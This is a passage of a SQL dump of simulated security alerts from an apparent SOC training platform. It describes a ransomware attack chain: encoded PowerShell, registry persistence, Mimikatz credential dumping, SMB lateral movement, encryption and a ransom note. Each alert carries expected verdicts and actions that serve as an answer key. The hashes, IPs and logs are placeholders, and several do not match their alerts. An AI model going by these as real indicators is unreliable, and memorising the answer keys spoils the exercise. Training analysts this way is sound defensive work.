privileges.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(359, 'Persistence Mechanism Established', 'high', 'Windows Event Logs', 'The malware modifies registry keys to ensure it runs on system startup, maintaining persistence even after reboots. The registry modification indicates a sophisticated attempt to establish persistence on the system.', 'Registry Modification', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"EventID\":4657,\"TimeCreated\":\"2023-10-25T14:35:22Z\",\"Computer\":\"victim-pc.localdomain\",\"UserID\":\"S-1-5-21-3456789012-3456789012-3456789012-1001\",\"UserName\":\"john.doe\",\"ProcessID\":4567,\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"RegistryKey\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\maliciousApp\",\"RegistryValue\":\"C:\\\\Users\\\\john.doe\\\\AppData\\\\Local\\\\Temp\\\\maliciousApp.exe -silent\",\"Hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"SourceIP\":\"192.168.1.105\",\"AttackerIP\":\"203.0.113.45\"}', '2026-01-03 00:50:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with the compromised system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"IP address known for malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"clean\",\"details\":\"User account on the compromised system.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.954Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4657,\\\"TimeCreated\\\":\\\"2023-10-25T14:35:22Z\\\",\\\"Computer\\\":\\\"victim-pc.localdomain\\\",\\\"UserID\\\":\\\"S-1-5-21-3456789012-3456789012-3456789012-1001\\\",\\\"UserName\\\":\\\"john.doe\\\",\\\"ProcessID\\\":4567,\\\"ProcessName\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\reg.exe\\\",\\\"RegistryKey\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\maliciousApp\\\",\\\"RegistryValue\\\":\\\"C:\\\\\\\\Users\\\\\\\\john.doe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\maliciousApp.exe -silent\\\",\\\"Hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"SourceIP\\\":\\\"192.168.1.105\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.954Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4657,\\\"TimeCreated\\\":\\\"2023-10-25T14:35:22Z\\\",\\\"Computer\\\":\\\"victim-pc.localdomain\\\",\\\"UserID\\\":\\\"S-1-5-21-3456789012-3456789012-3456789012-1001\\\",\\\"UserName\\\":\\\"john.doe\\\",\\\"ProcessID\\\":4567,\\\"ProcessName\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\reg.exe\\\",\\\"RegistryKey\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\maliciousApp\\\",\\\"RegistryValue\\\":\\\"C:\\\\\\\\Users\\\\\\\\john.doe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\maliciousApp.exe -silent\\\",\\\"Hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"SourceIP\\\":\\\"192.168.1.105\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.954Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4657,\\\"TimeCreated\\\":\\\"2023-10-25T14:35:22Z\\\",\\\"Computer\\\":\\\"victim-pc.localdomain\\\",\\\"UserID\\\":\\\"S-1-5-21-3456789012-3456789012-3456789012-1001\\\",\\\"UserName\\\":\\\"john.doe\\\",\\\"ProcessID\\\":4567,\\\"ProcessName\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\reg.exe\\\",\\\"RegistryKey\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\maliciousApp\\\",\\\"RegistryValue\\\":\\\"C:\\\\\\\\Users\\\\\\\\john.doe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\maliciousApp.exe -silent\\\",\\\"Hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"SourceIP\\\":\\\"192.168.1.105\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.954Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4657,\\\"TimeCreated\\\":\\\"2023-10-25T14:35:22Z\\\",\\\"Computer\\\":\\\"victim-pc.localdomain\\\",\\\"UserID\\\":\\\"S-1-5-21-3456789012-3456789012-3456789012-1001\\\",\\\"UserName\\\":\\\"john.doe\\\",\\\"ProcessID\\\":4567,\\\"ProcessName\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\reg.exe\\\",\\\"RegistryKey\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\maliciousApp\\\",\\\"RegistryValue\\\":\\\"C:\\\\\\\\Users\\\\\\\\john.doe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\maliciousApp.exe -silent\\\",\\\"Hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"SourceIP\\\":\\\"192.168.1.105\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.954Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4657,\\\"TimeCreated\\\":\\\"2023-10-25T14:35:22Z\\\",\\\"Computer\\\":\\\"victim-pc.localdomain\\\",\\\"UserID\\\":\\\"S-1-5-21-3456789012-3456789012-3456789012-1001\\\",\\\"UserName\\\":\\\"john.doe\\\",\\\"ProcessID\\\":4567,\\\"ProcessName\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\reg.exe\\\",\\\"RegistryKey\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\maliciousApp\\\",\\\"RegistryValue\\\":\\\"C:\\\\\\\\Users\\\\\\\\john.doe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\maliciousApp.exe -silent\\\",\\\"Hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"SourceIP\\\":\\\"192.168.1.105\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(360, 'Credential Dumping Detected', 'high', 'SIEM Alerts', 'The attackers used Mimikatz to extract credentials from memory, enabling lateral movement across the network to escalate privileges.', 'Mimikatz', 'Credential Dumping', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:33Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.25\",\"user\":\"DOMAIN\\\\admin_user\",\"filename\":\"mimikatz.exe\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\",\"process_id\":3216,\"event_type\":\"Credential Dumping\",\"message\":\"Suspicious process mimikatz.exe detected extracting credentials from memory.\"}', '2026-01-03 00:50:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_provider\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_db\",\"verdict\":\"malicious\",\"details\":\"Mimikatz executable used for credential extraction.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash associated with Mimikatz malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"DOMAIN\\\\admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"active_directory\",\"verdict\":\"internal\",\"details\":\"Privileged domain account used in the attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.956Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:33Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.25\\\",\\\"user\\\":\\\"DOMAIN\\\\\\\\admin_user\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"process_id\\\":3216,\\\"event_type\\\":\\\"Credential Dumping\\\",\\\"message\\\":\\\"Suspicious process mimikatz.exe detected extracting credentials from memory.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.956Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:33Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.25\\\",\\\"user\\\":\\\"DOMAIN\\\\\\\\admin_user\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"process_id\\\":3216,\\\"event_type\\\":\\\"Credential Dumping\\\",\\\"message\\\":\\\"Suspicious process mimikatz.exe detected extracting credentials from memory.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.956Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:33Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.25\\\",\\\"user\\\":\\\"DOMAIN\\\\\\\\admin_user\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"process_id\\\":3216,\\\"event_type\\\":\\\"Credential Dumping\\\",\\\"message\\\":\\\"Suspicious process mimikatz.exe detected extracting credentials from memory.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.956Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:33Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.25\\\",\\\"user\\\":\\\"DOMAIN\\\\\\\\admin_user\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"process_id\\\":3216,\\\"event_type\\\":\\\"Credential Dumping\\\",\\\"message\\\":\\\"Suspicious process mimikatz.exe detected extracting credentials from memory.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.956Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:33Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.25\\\",\\\"user\\\":\\\"DOMAIN\\\\\\\\admin_user\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"process_id\\\":3216,\\\"event_type\\\":\\\"Credential Dumping\\\",\\\"message\\\":\\\"Suspicious process mimikatz.exe detected extracting credentials from memory.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(361, 'Suspicious File Transfer', 'high', 'Network Traffic Analysis', 'Using SMB, the attackers transfer ransomware payloads to other critical systems within the network. This activity is indicative of lateral movement, preparing for a widespread encryption event.', 'SMB Traffic', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:10Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"192.168.1.105\",\"external_attacker_ip\":\"203.0.113.25\",\"protocol\":\"SMB\",\"file_transferred\":\"ransomware_payload.exe\",\"file_hash\":\"3b2e2c7d5f234f5c8a9b3a6261d4b7e2\",\"username\":\"compromised_user\",\"action\":\"file_transfer\",\"smb_command\":\"SMB2_WRITE\",\"destination_port\":\"445\"}', '2026-01-03 00:50:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted host for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP address associated with ransomware campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3b2e2c7d5f234f5c8a9b3a6261d4b7e2\",\"is_critical\":true,\"osint_result\":{\"source\":\"Virustotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known ransomware payload.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"malicious\",\"details\":\"Filename used in the ransomware attack campaign.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Account observed in unauthorized file transfer activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(362, 'Data Encryption in Progress', 'critical', 'File Integrity Monitoring', 'The ransomware begins encrypting files on key servers, prompting the attackers to initiate contact with a ransom demand.', 'Ransomware Encryption', 'T1486', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:23:32Z\",\"event_id\":\"FIM-20231005-001\",\"event_type\":\"file_modification\",\"description\":\"Suspicious file encryption activity detected on server.\",\"affected_host\":\"192.168.1.10\",\"attacker_ip\":\"203.0.113.45\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user\":\"admin_user\",\"filename_encrypted\":\"confidential_data.xlsx\",\"ransomware_name\":\"CryptoLockerSim\",\"process_name\":\"encryptor.exe\",\"process_id\":4567}', '2026-01-03 00:50:36', '2026-02-18 11:07:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal server targeted by ransomware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP associated with known ransomware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to CryptoLockerSim ransomware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.xlsx\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_system\",\"verdict\":\"suspicious\",\"details\":\"File targeted by ransomware encryption.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.958Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:32Z\\\",\\\"event_id\\\":\\\"FIM-20231005-001\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"description\\\":\\\"Suspicious file encryption activity detected on server.\\\",\\\"affected_host\\\":\\\"192.168.1.10\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename_encrypted\\\":\\\"confidential_data.xlsx\\\",\\\"ransomware_name\\\":\\\"CryptoLockerSim\\\",\\\"process_name\\\":\\\"encryptor.exe\\\",\\\"process_id\\\":4567}\"},{\"timestamp\":\"2026-02-01T20:31:18.958Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:32Z\\\",\\\"event_id\\\":\\\"FIM-20231005-001\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"description\\\":\\\"Suspicious file encryption activity detected on server.\\\",\\\"affected_host\\\":\\\"192.168.1.10\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename_encrypted\\\":\\\"confidential_data.xlsx\\\",\\\"ransomware_name\\\":\\\"CryptoLockerSim\\\",\\\"process_name\\\":\\\"encryptor.exe\\\",\\\"process_id\\\":4567}\"},{\"timestamp\":\"2026-02-01T20:30:18.958Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:32Z\\\",\\\"event_id\\\":\\\"FIM-20231005-001\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"description\\\":\\\"Suspicious file encryption activity detected on server.\\\",\\\"affected_host\\\":\\\"192.168.1.10\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename_encrypted\\\":\\\"confidential_data.xlsx\\\",\\\"ransomware_name\\\":\\\"CryptoLockerSim\\\",\\\"process_name\\\":\\\"encryptor.exe\\\",\\\"process_id\\\":4567}\"},{\"timestamp\":\"2026-02-01T20:29:18.958Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:32Z\\\",\\\"event_id\\\":\\\"FIM-20231005-001\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"description\\\":\\\"Suspicious file encryption activity detected on server.\\\",\\\"affected_host\\\":\\\"192.168.1.10\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename_encrypted\\\":\\\"confidential_data.xlsx\\\",\\\"ransomware_name\\\":\\\"CryptoLockerSim\\\",\\\"process_name\\\":\\\"encryptor.exe\\\",\\\"process_id\\\":4567}\"},{\"timestamp\":\"2026-02-01T20:28:18.958Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:32Z\\\",\\\"event_id\\\":\\\"FIM-20231005-001\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"description\\\":\\\"Suspicious file encryption activity detected on server.\\\",\\\"affected_host\\\":\\\"192.168.1.10\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename_encrypted\\\":\\\"confidential_data.xlsx\\\",\\\"ransomware_name\\\":\\\"CryptoLockerSim\\\",\\\"process_name\\\":\\\"encryptor.exe\\\",\\\"process_id\\\":4567}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(363, 'Ransom Note and Communication', 'critical', 'Incident Response Team', 'A ransom note has appeared on encrypted systems, instructing the company to contact the attackers for decryption keys. The note includes specific communication channels and requests for payment in cryptocurrency. The Incident Response Team is working to find a flaw in the encryption while simulating negotiations with the attackers.', 'Ransomware Note', 'T1486 - Data Encrypted for Impact', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-21T14:45:00Z\",\"event\":\"Ransomware Note Detected\",\"source_ip\":\"192.168.15.45\",\"destination_ip\":\"203.0.113.5\",\"ransom_note_filename\":\"READ_ME.txt\",\"ransom_note_content\":\"All your files have been encrypted. Contact us at attacker@example.com for decryption keys.\",\"attacker_email\":\"attacker@example.com\",\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"user\":\"j.doe\",\"severity\":\"Critical\",\"encryption_algorithm\":\"AES-256\",\"affected_systems\":[\"10.0.0.5\",\"10.0.0.10\"]}', '2026-01-03 00:50:36', '2026-02-18 11:11:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.15.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with ransomware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"email reputation service\",\"verdict\":\"malicious\",\"details\":\"Email address associated with ransom demands.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash database\",\"verdict\":\"malicious\",\"details\":\"Hash of the ransomware binary detected.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"READ_ME.txt\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal analysis\",\"verdict\":\"suspicious\",\"details\":\"Common filename for ransom notes.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.959Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:45:00Z\\\",\\\"event\\\":\\\"Ransomware Note 